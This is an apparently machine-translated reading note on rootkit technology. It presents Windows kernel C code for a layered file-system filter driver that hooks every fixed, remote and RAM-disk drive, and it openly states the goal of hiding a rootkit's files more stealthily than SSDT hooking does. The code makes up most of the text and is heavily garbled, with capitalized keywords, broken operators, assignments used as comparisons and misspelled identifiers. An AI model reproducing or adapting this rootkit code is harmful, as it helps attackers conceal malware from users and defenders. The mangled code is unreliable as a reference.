Reading Note _ Rootkit Technology _ file Filter Driver (1)

Hierarchical drivers can be applied to file systems. For the sake of potential, the file system has a special appeal to rootkit. Many rootkits need to store files in the file system, and these files must be hidden. You can use the hook technique to hide files, but this method is easy to detect. In addition, if files or directories are installed on the SMB shared system, the system service description table (SSDT) cannot be hidden. The following shows how to hide a file by using a hierarchical driver.

First, let's look at the DriverEntry routine of the driver's entry function:

NTSTATUSDriverEntry (IN PDRIVER_OBJECT DriverObject,

IN PUNICODE_STRINGRegistryPath)

{

For (I = 0; I <= IRP_MJ_MAXIMUM_FUNCTION; I ++)

{

DriverObject-> MajorFunctionp [I] = OurDispatch;

}

DriverObject-> FastIoDispatch = & OurFastIOHook;

In the DriverEntry routine, the majorfunction array points to the ourdispatch scheduling routine, and a fastiodispatch scheduling table is created. here we can see some specific content of the file system driver. Fastio is another communication method for file system programs.

After preparing the scheduling table, you must hook the drive and call the hookdriveset function to install the hook on all available drive letters:

DWORD d_hdrives = 0;

// Initializethe drives we will hool

For (I = 0; I <26; I ++)

Drivehookdevices [I] = NULL;

Drivetohook = 0;

Ntstatus = getdrivestohook (& d_hdrives );

If (! Nt_success (ntstatus ))

Return ntstatus;

Hookdriveset (d_hdrives, driverobject );

Run the following code to obtain the list of hooked drivers:

Ntstatusgetdrivestohook (DWORD * d_hookdrives)

{

Ntstatus;

Process_devicemap_information s_devmap;

DWORD maxdriveset, curdriveset;

Int drive;

If (d_hookDrives = NULL)

Return STATUS_UNSUCCESSFUL;

Note the current process handle usage:

Ntstatus = ZwQueryInformationProcess (HANDLE) 0 xffffffff,

ProcessDeviceMap,

& S_devMap,

Sizeof (s_devMap ),

NULL );

If (! NT_SUCCESS (ntstatus ))

Return ntstatus;

// Get available drives we can monitor.

MaxDriveSet = s_devMap.Query.DriveMap;

CurDriveSet = MaxDriveSet;

For (drive = 0; drive <32; ++ drive)

{

If (MaxDriveSet & (1 <drive ))

{

Switch (s_devMap.Query.DriveType [drive])

{

First, process the drive to be skipped:

// We don't like these: remove them.

Case DRIVE_UNKNOWN: // Thedrive type cannot be determined.

Case DRIVE_NO_ROOT_DIR; // The root directory does not exit.

CurDriveSet & = ~ (1 <drive );

Break;

// The drive can be removed from the drive

// Doesn't make sense to put hidden files on

// A removable drive because we will not

// Necessarily control the computer that

// Drive is mounted on next.

Case DRIVE_REMOVABLE:

CurDriveSet & = ~ (1 <drive );

Break;

// The drive is a CD-ROM drive

Case DRIVE_CDROM;

CurDriveSet & = ~ (1 <drive );

Break;

Drive: DRIVE_FIXED, DRIVE_REMOTE and DRIVE_RAMDISK.

The Code continues as follows:

}

}

}

* D_hookDrives = CurDriveSet;

Return ntstatus;

}

The code for capturing a drive set is as follows:

ULONG HookDriveSet (in ulong DriveSet, IN PDRIVER_OBJECT DriverObject)

{

PHOOK_EXTENSION hookExt;

ULONG drive, I;

ULONG bit;

// Scan the drive table, looking for hits on the DriveSet bitmask.

For (drive = 0; drive <26; ++ drive _

{

Bit = 1 <drive;

// Are we supposed to hookthis drive

If (BIT & driveset )&&! (BIT & drivestohook ))

{

If (! Hookdrive (drive, driverobject ))

{

// Remove from drive setif can't be hooked

Driveset & = ~ Bit;

}

Else

{

// Hook drives in samedrive Group

For (I = 0; I <26; I ++)

{

If (drivehookdevices [I] = drivehookdevices [Drive])

{

Driveset | = (1 <I );

}

}

}

}

Else if (! (Bit & DriveSet) & (bit & DrivesToHook ))

{

// Unhook this drive and all in the group

For (I = 0; I <26; I ++)

{

If (DriveHookDevices [I] = DriveHookDevices [drive])

{

UnhookDrive (I );

DriveSet & = ~ (1 <I );

}

}

}

}

// Return set of drives currently hooked.

DrivesToHook = DriveSet;

Return DriveSet;

}

The code for mounting you and removing the hook on a single drive is as follows:
If (DriveHookDevices [Drive])

{

HookExt = DriveHookDevices [Drive]-> DeviceExtension;

HookExt-> Hooked = FALSE;

}

}

 

BOOLEAN HookDrive (in ulong Drive, IN PDRIVER_OBJECT DriverObject)

{

IO_STATUS_BLOCK ioStatus;

HANDLE ntFileHandle;

OBJECT_ATTRIBUTESobjectAttributes;

PDEVICE_OBJECTfileSysDevice;

PDEVICE_OBJECT hookDevice;

UNICODE_STRINGfileNameUnicodeString;

PFILE_FS_ATTRIBUTE_INFORMATIONfileFsAttributes;

ULONG fileFsAttributesSize;

WCHAR filename [] = L "\ DosDevices \ :\\";

NTSTATUS ntStatus;

Ulong I;

PFILE_OBJECT fileObject;

PHOOK_EXTENSIONhookExtension;

If (Drive> = 26)

Return FALSE; // Illegal drive letter

// Test whether we havehooked this drive

If (DriveHookDevices [Drive] = NULL)

{

Filename [12] = (CHAR) ('A' + Drive); // Set up drive name

Open the root directory of the disk volume below:

RtlInitUnicodeString (& fileNameUnicodeString, filename );

InitializeObjectAttributes (& objectAttributes,

& FileNameUnicodeString, OBJ_CASE_INSENSITIVE, NULL, NULL );

NtStatus = ZwCreateFile (& ntFileHandle,

SYNCHRONIZE | FILE_ANY_ACCESS,

& ObjectAttributes,

& IoStatus,

NULL,

0,

File_pai_read | file_pai_write,

FILE_OPEN,

FILE_SYNCHRONOUS_IO_NONALERT | FILE_DIRECTORY_FILE,

Null,

0 );

If (! Nt_success (ntstatus ))

{

If the program cannot open the drive, "false" is returned ":

Return false;

}

// Use file handle to look up the fileobject.

// If this is successful,

// We must eventually decrement the fileobject

Ntstatus = obreferenceobjectbyhandle (ntfilehandle,

FILE_READ_DATA,

NULL,

KernelMode,

& Fileobject,

NULL );

If (! NT_SUCCESS (ntStatus ))

{

If the program cannot obtain the file object from the handle, "false" is returned ":

ZwClose (ntFileHandle );

Return FALSE;

}

// Get the device object from the Fileobject

FileSysDevice = IoGetRelatedDeviceObject (fileObject );

If (! FileSysDevice)

{

If the program cannot obtain the device object, "flase" is returned ":

ObDereferenceObject (fileObject );

ZwClose (ntFileHandle );

Return FALSE;

}

// Check the device list to see if we arealready

// Attached to this special device

// This can happen when more than one driveletter

// Is being handled by the same network

// Redirector

For (I = 0; I <26; I ++)

{

If (DriveHookDevices [I] = fileSysDevice)

{

// If we are already watching it

// Associate this drive letter

// With the others that are handled

// By the same network driver. This enables us to intelligentlyupdate

// The hooking menus when the user specifies that one of the groupshocould not be

// Watched-we mark all of the related drives as unwantched aswell.

ObDereferenceObject (fileObject );

ZwClose (ntFileHandle );

DriveHookDevice [Drive] = fileSysDevice;

Return TRUE;

}

}

// The file system's device hasn't been hooked already, so make ahooking device object // that will be attached to it

NtStatus = IoCreateDevice (DriverObject,

Sizeof (HOOK_EXTENSION ),

NULL,

FileSysDevice-> DeviceType.

FileSysDevice-> Characteristics,

FALSE,

& HookDevice );

If (! NT_SUCCESS (ntStatus ))

{

If the program cannot create related devices, "false" is returned ":

ObDereferenceObject (fileObject );

ZwClose (ntFileHandle );

Return FALSE;

}

// Clear he device's init flag

// If we do not clear this flag, it is speculated no one else wouldbe able to layer on top

// Of us. This may be a useful feature in the future!

HookDevice-> Flags & = ~ DO_DEVICE_INITIALIZEING;

HookDevice-> Flags | = (fileSysDevice-> Flags & (DO_BUFFERED_IO | DO_DIRECT_TO ));

// Set up the device extensions. The drive letter and file system objectare stored in

// Extenson

HookExtension = hookDevice-> DeviceExtension;

HookExtension-> LogicalDrive = 'A' + Drive;

HookExtension-> FileSystem = fileSysDevice;

HookExtension-> Hooked = TRUE;

HookExtension-> Type = STANDARD;

// Finally, attach to the device. As soon as we are successfullyattached, we may start

// Processing ing IRPs targeted at the device we are hooked.

NtStatus = IoAttachDeviceByPointer (hookDevice, fileSysDevice );

If (! NT_SUCCESS (ntStatus ))

{

ObDereferenceObject (fileObject );

ZwClose (ntFileHandle );

Return FALSE;

}

 

// Determine whether this is an NTFS drive

 

FileFsAttributesSize = sizeof (FILE_FS_ATTRIBUTE_INFORMATION) + MAXPATHLEN;

HookExtension-> FsAttributes = (PFILE_FS_ATTRIBUTE_INFORMATION)

ExAllocatePool (NonPagedPool, fileFsAttributesSize );

If (hookExtension-> FsAttributes &&! NT_SUCCESS (

IoQueryVolumeInformation (fileObject, FileFsAttributeInformation, fileFSAttributesSize,

HookExtension-> FsAttributes,

& FileFsAttributesSize )))

{

// On failure, we just don 'thave attributes for this file system.

ExFreePool (hookExtesnion-> FsAttributes _;

HookExtension-> FsAttributes = NULL;

}

// Close the file and update the hooked drive list by entering apointer to the hook

// Device object in it.

ObDereferenceObject (fileObject );

ZwClose (ntFileHandle );

DriveHookDevices [Drive] = hookDevice;

}

Else // This drive is already hooked

{

HookExtension = DriveHookDevices [Drive]-> DeviceExtension;

HookExtension-> Hooked = TRUE;

}

Return TRUE;

}

 

 

;